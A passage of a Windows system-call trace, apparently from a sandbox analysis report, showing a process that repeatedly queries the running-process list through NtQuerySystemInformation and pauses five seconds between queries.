SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.323] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.337] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.351] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.359] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.365] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.371] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.384] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.392] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.405] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.441] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.449] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.456] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.462] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.476] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.484] 